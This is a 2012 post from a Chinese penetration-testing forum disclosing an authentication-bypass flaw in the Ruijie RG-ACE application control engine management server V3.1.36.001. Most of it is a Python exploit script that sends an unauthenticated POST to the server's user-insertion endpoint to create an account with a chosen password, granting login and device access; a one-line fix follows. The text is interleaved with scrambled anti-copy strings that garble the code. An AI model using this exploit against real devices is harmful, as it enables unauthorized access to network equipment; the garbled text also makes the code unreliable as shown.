找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2129|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
% o- W# v$ b. n3 E: a  M4 t) P" Z( k9 `! Y
* \; w9 L$ Y/ c4 z2 w
测试的具体版本是: r) m' Z7 M+ `! T, c+ J  j1 ^; _
产品名称: 锐捷应用控制引擎7 x" {8 `; L. v1 Q; u$ v& ]2 V: A3 n7 s
版本号: 3.1.36.001 TC) [. g! W1 Z' Z6 B3 O$ T% N. W
编译时间: 201104291730
- @+ S! u$ z+ y( b5 V7 m& t) Q 2 ]; h# ?/ n3 ^/ ~, T' [

' ^% ~3 b/ t4 \/ s漏洞证明:" g" S$ z8 F& G: W: o
. g- V: c. P3 E& ]

0 U  @3 M$ [! F& X) ~+ ]. F! J( M0 J) q0 E# D, ~7 r

2 s, x* @, X" ^1 y/ [+ A/ X5 s" |- P8 x! ~/ u" T8 d
. t/ \6 p' V5 s3 h
执行脚本: Q0 P: b" ]' I1 q0 _+ V/ ^
#! /usr/bin/env python  T; J4 c7 q/ {; d7 Y
#coding=gbk
+ C+ b( S7 ^# A#RG-ACE管理服务器 V3.1.36.001
+ |* b' J0 o4 \6 U: K. m- X' bimport urllib2, urllib,cookielib6 T1 y6 ?# L9 n4 ~  p$ n. {! x$ Z
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
/ z- J% W) R; ]1 hopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))1 I$ y# b" {0 [
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]- e3 E% o  q% n& ^
post=(("event","userManager.doInsertUserInfo"),& j8 o& e3 T; W' j& |6 p
("useractionname","addButtonValue"),
) V: b/ X. V/ f0 W" c  s  j9 b("useropermanager","userManager"),
9 l& r6 J5 B; d2 F9 A4 ^! h' L("userName","t"), #######账号自己加
# V( Z: B  o8 n5 i/ ]2 g("pwd","aaaaaa"),######密码自己加/ M" s+ E, N8 \
("trueName","ad"),9 \/ u5 X. {( F. I. [$ [/ s
("email",""),
! i! e0 ~% [$ z% z5 @) N. ^8 k; M3 Z("mobilePhone",""),
7 U9 o6 W4 k2 X$ f$ ^8 s& G("officePhone",""),5 c- }; v$ [5 y0 n' Q) p
("addr","")," P  v9 [; e7 o; r# I
("submit","确定"))' s+ l' \$ B0 S1 r5 {
urllib2.install_opener(opener)
7 U; H3 B: E1 @0 R) q2 B. R+ C$ Pp=urllib2.urlopen(url, urllib.urlencode(post)).read()+ x, }5 C" H% ^- K. |% s" F
print "Done"! u. m* K$ H0 r0 f

' r+ l5 t: n5 u, Q. Z# j4 `  l登录,连接设备- X5 ]: G2 y  s
+ T/ `5 a/ Z' H9 t! R% a0 D9 R

, `: n! {/ p3 W5 K/ d8 h- s: d( c! a' E
2 g3 R: b4 \% |" L

5 E3 s( J  ]8 P- d, [( X* T默认的管理员admin权限更大点7 U$ M8 p" K1 a6 ^

) P" R4 L; b: p
" P2 y( t! `5 M) Z& r1 V6 S4 n; O0 a& w0 m. c3 K0 K, L
, n% {. P  E0 h: T, a9 z6 k

# g) P1 S6 w* m( l- X% M修复方案:" w1 F1 L6 H  j" b2 @) b
加强对接口的权限验证
* l% i0 F! K$ L, K% p& ~) G: ~! p
* Z+ Q6 k5 w! {0 i$ V4 w
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表